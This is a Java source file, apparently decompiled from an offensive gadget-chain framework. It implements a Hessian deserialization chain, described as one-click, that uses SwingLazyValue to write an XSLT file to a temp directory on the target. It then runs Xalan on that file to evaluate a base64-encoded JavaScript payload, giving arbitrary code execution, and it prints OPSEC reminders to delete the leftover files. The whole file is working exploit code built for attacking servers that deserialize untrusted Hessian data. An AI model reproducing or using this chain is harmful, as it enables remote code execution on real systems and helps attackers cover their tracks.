package com.ar3h.chains.gadget.impl.hessian.jdk;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.exception.ThrowsUtil;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.common.util.PayloadHelper;
import java.util.LinkedList;
import javax.swing.UIDefaults;
import org.apache.commons.codec.binary.Base64;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import sun.swing.SwingLazyValue;

@GadgetAnnotation(name = "Xslt整合链2 一键通过js实现代码执行", description = "使用JavaUtils写xml文件，之后再调用Process函数解析进行任意代码执行，使用JS表达式来执行\n不同于Xslt1链，本链使用Js来执行，不依赖Spring环境\n注意执行后会在指定目录下残留两个文件\n此链可重复执行，会覆盖之前的Payload文件", dependencies = {"jdk<11"}, authors = {Authors.cop233, Authors.Ar3h}, priority = 40)
@GadgetTags(tags = {Tag.HessianDeserialize}, nextTags = {Tag.Js_Expr})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/hessian/jdk/XsltOnlyJdk.class */
public class XsltOnlyJdk implements Gadget {
    private static final Logger log = LoggerFactory.getLogger((Class<?>) XsltOnlyJdk.class);

    @Param(name = "目标操作系统", description = "可选 {linux, windows}，默认对应路径如下：\nlinux: /tmp/_tomcat_data_temp\nwindows: C:\\Windows\\Temp\\_tomcat_data_temp", type = ParamType.Choice, choices = {@Choice("linux"), @Choice("windows")})
    public String os = "linux";

    @Param(name = "创建目标文件的绝对路径", description = "创建xml文件，测试发现使用相对路径存在问题，建议使用绝对路径", requires = false)
    public String path;
    public String className;
    GadgetContext context;
    static final String xsltTemplate = "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\nxmlns:ob=\"http://xml.apache.org/xalan/java/java.lang.Object\" \nxmlns:clazz=\"http://xml.apache.org/xalan/java/java.lang.Class\" \nxmlns:base=\"http://xml.apache.org/xalan/java/javax.xml.bind.DatatypeConverter\"\nxmlns:stringclazz=\"http://xml.apache.org/xalan/java/java.lang.String\"\nxmlns:jsclazz=\"http://xml.apache.org/xalan/java/javax.script.ScriptEngineManager\"\nxmlns:jseclazz=\"http://xml.apache.org/xalan/java/javax.script.ScriptEngine\"\n>\n<xsl:template match=\"/\">\n     <xsl:variable name=\"payload\" select=\"stringclazz:new(base:parseBase64Binary('%s'))\"/>\n      <xsl:variable name=\"jsobj\" select=\"jsclazz:new()\"/>\n     <xsl:variable name=\"jso\" select=\"jsclazz:getEngineByName($jsobj,'js')\"/>\n     <xsl:variable name=\"jse\" select=\"jseclazz:eval($jso,$payload)\"/>\n     <xsl:value-of select=\"$jse\"/>\n\n    </xsl:template>\n  </xsl:stylesheet>";

    public Object getObject(String str) throws Exception {
        String str2 = null;
        if ("linux".equalsIgnoreCase(this.os)) {
            str2 = "/tmp/_tomcat_data_temp";
        } else if ("windows".equalsIgnoreCase(this.os)) {
            str2 = "C:\\Windows\\Temp\\_tomcat_data_temp";
        } else {
            ThrowsUtil.throwGadgetException("Unsupported os: " + this.os);
        }
        if (this.path != null && !this.path.isEmpty()) {
            str2 = this.path;
        }
        String str3 = "[OPSEC] you need to clean the target file: " + str2;
        String str4 = "[OPSEC] you need to clean the target file: " + str2 + ".class";
        log.warn(str3);
        log.warn(str4);
        this.context.log(str3);
        this.context.log(str4);
        SwingLazyValue swingLazyValue = new SwingLazyValue("com.sun.org.apache.xml.internal.security.utils.JavaUtils", "writeBytesToFilename", new Object[]{str2, String.format(xsltTemplate, Base64.encodeBase64String(str.getBytes())).getBytes()});
        SwingLazyValue swingLazyValue2 = new SwingLazyValue("com.sun.org.apache.xalan.internal.xslt.Process", "_main", new Object[]{new String[]{"-XT", "-XSL", "file://" + str2}});
        LinkedList linkedList = new LinkedList();
        linkedList.add(getMap(swingLazyValue));
        linkedList.add(getMap(swingLazyValue2));
        return linkedList;
    }

    public Object getMap(SwingLazyValue swingLazyValue) throws Exception {
        UIDefaults uIDefaults = new UIDefaults();
        UIDefaults uIDefaults2 = new UIDefaults();
        uIDefaults.put("gadget-chains", swingLazyValue);
        uIDefaults2.put("gadget-chains", swingLazyValue);
        return PayloadHelper.makeMap(uIDefaults, uIDefaults2);
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        this.context = gadgetContext;
        return getObject((String) gadgetChain.doCreate(gadgetContext));
    }
}
